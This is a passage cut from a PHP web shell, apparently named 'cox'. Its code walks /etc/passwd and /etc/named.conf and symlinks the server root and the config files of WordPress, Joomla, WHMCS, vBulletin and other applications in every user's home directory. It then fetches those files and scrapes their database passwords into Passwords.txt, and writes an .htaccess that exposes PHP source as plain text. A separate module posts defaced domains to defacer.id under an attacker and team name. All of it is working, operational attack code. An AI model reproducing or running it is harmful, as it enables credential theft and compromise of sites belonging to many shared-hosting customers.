2008. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
2009. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
2010. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
2011.  
2012. //Home4
2013.  
2014. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
2015. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
2016. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
2017. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
2018. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
2019. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
2020. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
2021. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
2022. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
2023. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
2024. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
2025. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
2026. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
2027. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
2028. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
2029. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
2030. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
2031. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
2032. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
2033. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
2034. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
2035. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
2036. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
2037. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
2038. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
2039. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
2040. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
2041. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
2042. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
2043. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
2044. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
2045. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
2046. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
2047. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
2048. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
2049. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
2050. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
2051. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
2052. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
2053. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
2054. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
2055. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
2056. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
2057. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
2058. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
2059. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
2060. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
2061. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
2062. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
2063. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2064. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2065. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
2066. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
2067. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
2068. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
2069. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
2070. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
2071. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
2072. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
2073. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
2074. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
2075. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
2076. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
2077. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
2078. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
2079. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
2080. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
2081. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
2082. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
2083. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
2084. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
2085. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
2086. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
2087. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
2088. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
2089. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
2090. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
2091. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
2092. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
2093. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
2094. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
2095. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
2096. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
2097. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
2098. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
2099. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
2100. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
2101. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
2102. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
2103. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
2104. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
2105. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
2106. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
2107. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
2108. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
2109. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
2110. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
2111. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
2112. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
2113. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2114. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2115. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2116. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
2117. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
2118. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
2119. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
2120. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
2121. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
2122. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
2123. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
2124. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
2125. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
2126. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
2127. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
2128. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
2129. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
2130. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
2131. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
2132. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
2133. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
2134. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
2135. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
2136. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
2137. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
2138. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
2139. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
2140. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2141. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2142. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2143. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
2144. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
2145. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
2146. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
2147. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
2148. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
2149. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
2150. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
2151. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
2152. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
2153. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
2154. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
2155. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
2156. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
2157. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
2158. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
2159. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
2160. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
2161. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
2162. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
2163. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
2164. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
2165. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
2166. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
2167. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
2168. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
2169. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
2170. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
2171. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
2172. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
2173. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
2174. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
2175. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
2176. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
2177. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
2178. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
2179. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
2180. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
2181. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
2182. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
2183. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
2184. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
2185. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
2186. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
2187. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
2188. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
2189. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
2190. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
2191. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
2192. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
2193. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
2194.  
2195. }
2196.  
2197. //password grab
2198.  
2199. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
2200. {
2201.  
2202. $ar0=explode($marqueurDebutLien, $text);
2203. $ar1=explode($marqueurFinLien, $ar0[1]);
2204. $ar=trim($ar1[0]);
2205. return $ar;
2206. }
2207.  
2208. $ffile=fopen('Passwords.txt','a+');
2209.  
2210.  
2211. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/cox_symconf/";
2212. $re=$r;
2213. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
2214.  
2215. $users=file("/etc/passwd");
2216. foreach($users as $user)
2217. {
2218.  
2219. $str=explode(":",$user);
2220. $usersss=$str[0];
2221. foreach($confi as $co)
2222. {
2223.  
2224.  
2225. $uurl=$re.$usersss.$co;
2226. $uel=$uurl;
2227.  
2228. $ch = curl_init();
2229.  
2230. curl_setopt($ch, CURLOPT_URL, $uel);
2231. curl_setopt($ch, CURLOPT_HEADER, 1);
2232. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2233. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2234. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
2235. $result['EXE'] = curl_exec($ch);
2236. curl_close($ch);
2237. $uxl=$result['EXE'];
2238.  
2239.  
2240. if($uxl && preg_match('/table_prefix/i',$uxl))
2241. {
2242.  
2243. //Wordpress
2244.  
2245. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
2246. if(!empty($dbp))
2247. $pass=$dbp."\n";
2248. fwrite($ffile,$pass);
2249.  
2250. }
2251. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
2252. {
2253.  
2254. //WHMCS
2255.  
2256. $dbp=entre2v2($uxl,"db_password = '","';");
2257. if(!empty($dbp))
2258. $pass=$dbp."\n";
2259. fwrite($ffile,$pass);
2260.  
2261. }
2262.  
2263.  
2264. elseif($uxl && preg_match('/dbprefix/i',$uxl))
2265. {
2266.  
2267. //Joomla
2268.  
2269. $db=entre2v2($uxl,"password = '","';");
2270. if(!empty($db))
2271. $pass=$db."\n";
2272. fwrite($ffile,$pass);
2273. }
2274. elseif($uxl && preg_match('/admincpdir/i',$uxl))
2275. {
2276.  
2277. //Vbulletin
2278.  
2279. $db=entre2v2($uxl,"password'] = '","';");
2280. if(!empty($db))
2281. $pass=$db."\n";
2282. fwrite($ffile,$pass);
2283.  
2284. }
2285. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
2286. {
2287.  
2288. //Other
2289.  
2290. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
2291. if(!empty($db))
2292. $pass=$db."\n";
2293. fwrite($ffile,$pass);
2294. }
2295. elseif($uxl && preg_match('/dbpass/i',$uxl))
2296. {
2297.  
2298. //Other
2299.  
2300. $db=entre2v2($uxl,"dbpass = '","';");
2301. if(!empty($db))
2302. $pass=$db."\n";
2303. fwrite($ffile,$pass);
2304. }
2305. elseif($uxl && preg_match('/dbpass/i',$uxl))
2306. {
2307.  
2308. //Other
2309.  
2310. $db=entre2v2($uxl,"dbpass = '","';");
2311. if(!empty($db))
2312. $pass=$db."\n";
2313. fwrite($ffile,$pass);
2314.  
2315. }
2316. elseif($uxl && preg_match('/dbpass/i',$uxl))
2317. {
2318.  
2319. //Other
2320.  
2321. $db=entre2v2($uxl,"dbpass = \"","\";");
2322. if(!empty($db))
2323. $pass=$db."\n";
2324. fwrite($ffile,$pass);
2325. }
2326.  
2327.  
2328. }
2329. }
2330. echo "<center>
2331. <a href=\"cox_symconf/root/\">Root Server</a>
2332. <br><a href=\"cox_symconf/Passwords.txt\">Passwords</a>
2333. <br><a href=\"cox_symconf/\">Configurations</a></center>";
2334. }
2335. else
2336. {
2337. echo "<center>
2338. <form method=\"POST\">
2339. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
2340. $file = '/etc/passwd';
2341. $read = @fopen($file, 'r');
2342. if ($read){
2343. $body = @fread($read, @filesize($file));
2344. echo "".htmlentities($body)."";
2345. }
2346. elseif(!$read)
2347. {
2348. $read = @show_source($file) ;
2349. }
2350. elseif(!$read)
2351. {
2352. $read = @highlight_file($file);
2353. }
2354. elseif(!$read)
2355. {
2356. for($uid=0;$uid<1000;$uid++)
2357. {
2358. $ara = posix_getpwuid($uid);
2359. if (!empty($ara))
2360. {
2361. while (list ($key, $val) = each($ara))
2362. {
2363. print "$val:";
2364. }
2365. print "\n";
2366. }}}
2367.  
2368. flush();
2369.  
2370. echo "</textarea>
2371. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
2372. </form></center>";
2373. }
2374. }
2375. }
2376. elseif($_GET['do'] == 'symlink') {
2377. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2378. $d0mains = @file("/etc/named.conf");
2379. ##httaces
2380. if($d0mains){
2381. @mkdir("cox_sym",0777);
2382. @chdir("cox_sym");
2383. @exe("ln -s / root");
2384. $file3 = 'Options Indexes FollowSymLinks
2385. DirectoryIndex jancox.htm
2386. AddType text/plain .php
2387. AddHandler text/plain .php
2388. Satisfy Any';
2389. $fp3 = fopen('.htaccess','w');
2390. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2391. echo "
2392. <table align=center border=1 style='width:60%;border-color:#333333;'>
2393. <tr>
2394. <td align=center><font size=2>S. No.</font></td>
2395. <td align=center><font size=2>Domains</font></td>
2396. <td align=center><font size=2>Users</font></td>
2397. <td align=center><font size=2>Symlink</font></td>
2398. </tr>";
2399. $dcount = 1;
2400. foreach($d0mains as $d0main){
2401. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
2402. flush();
2403. if(strlen(trim($domains[1][0])) > 2){
2404. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2405. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
2406. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
2407. <td>".$user['name']."</td>
2408. <td><a href='$full/cox_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
2409. flush();
2410. $dcount++;}}}
2411. echo "</table>";
2412. }else{
2413. $TEST=@file('/etc/passwd');
2414. if ($TEST){
2415. @mkdir("cox_sym",0777);
2416. @chdir("cox_sym");
2417. exe("ln -s / root");
2418. $file3 = 'Options Indexes FollowSymLinks
2419. DirectoryIndex jancox.htm
2420. AddType text/plain .php
2421. AddHandler text/plain .php
2422. Satisfy Any';
2423.  $fp3 = fopen('.htaccess','w');
2424.  $fw3 = fwrite($fp3,$file3);
2425.  @fclose($fp3);
2426.  echo "
2427. <table align=center border=1><tr>
2428. <td align=center><font size=3>S. No.</font></td>
2429. <td align=center><font size=3>Users</font></td>
2430. <td align=center><font size=3>Symlink</font></td></tr>";
2431.  $dcount = 1;
2432.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
2433.  while(!feof($file)){
2434.  $s = fgets($file);
2435.  $matches = array();
2436.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2437.  $matches = str_replace("home/","",$matches[1]);
2438.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2439.  continue;
2440.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
2441. <td align=center><font class=txt>" . $matches . "</td>";
2442.  echo "<td align=center><font class=txt><a href=$full/cox_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2443.  $dcount++;}fclose($file);
2444.  echo "</table>";}else{if($os != "Windows"){@mkdir("cox_sym",0777);@chdir("cox_sym");@exe("ln -s / root");$file3 = '
2445. Options Indexes FollowSymLinks
2446. DirectoryIndex jancox.htm
2447. AddType text/plain .php
2448. AddHandler text/plain .php
2449. Satisfy Any
2450. ';
2451.  $fp3 = fopen('.htaccess','w');
2452.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2453.  echo "
2454. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
2455. <table align=center border=1><tr>
2456. <td align=center><font size=3>ID</font></td>
2457. <td align=center><font size=3>Users</font></td>
2458. <td align=center><font size=3>Symlink</font></td></tr>";
2459.  $temp = "";$val1 = 0;$val2 = 1000;
2460.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
2461.  if ($uid)$temp .= join(':',$uid)."\n";}
2462.  echo '<br/>';$temp = trim($temp);$file5 =
2463.  fopen("test.txt","w");
2464.  fputs($file5,$temp);
2465.  fclose($file5);$dcount = 1;$file =
2466.  fopen("test.txt", "r") or exit("Unable to open file!");
2467.  while(!feof($file)){$s = fgets($file);$matches = array();
2468.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
2469.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2470.  continue;
2471.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
2472. <td align=center><font class=txt>" . $matches . "</td>";
2473.  echo "<td align=center><font class=txt><a href=$full/cox_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2474.  $dcount++;}
2475.  fclose($file);
2476.  echo "</table></div></center>";unlink("test.txt");
2477.  } else
2478.  echo "<center><font size=3>Cannot create Symlink</font></center>";
2479.  }
2480.  }    
2481. }
2482. elseif($_GET['do'] == 'defacerid') {
2483. echo "<center><form method='post'>
2484.         <u>Defacer</u>: <br>
2485.         <input type='text' name='hekel' size='50' value='Fix404'><br>
2486.         <u>Team</u>: <br>
2487.         <input type='text' name='tim' size='50' value='Hackivist Team'><br>
2488.         <u>Domains</u>: <br>
2489.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
2490.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
2491.         </form>";
2492. $site = explode("\r\n", $_POST['sites']);
2493. $go = $_POST['go'];
2494. $hekel = $_POST['hekel'];
2495. $tim = $_POST['tim'];
2496. if($go) {
2497. foreach($site as $sites) {
2498. $zh = $sites;
2499. $form_url = "https://www.defacer.id/notify";
2500. $data_to_post = array();
2501. $data_to_post['attacker'] = "$hekel";
2502. $data_to_post['team'] = "$tim";
2503. $data_to_post['poc'] = 'SQL Injection';
2504. $data_to_post['url'] = "$zh";
2505. $curl = curl_init();
2506. curl_setopt($curl,CURLOPT_URL, $form_url);
2507. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
2508. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
2509. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
2510. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2511. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
2512. $result = curl_exec($curl);
2513. echo $result;
2514. curl_close($curl);
2515. echo "<br>";
2516. }
2517. }
2518. }
2519.  
2520. elseif($_GET['do'] == 'config') {
2521.     if($_POST){
2522.         $passwd = $_POST['passwd'];
2523.         mkdir("cox_config", 0777);
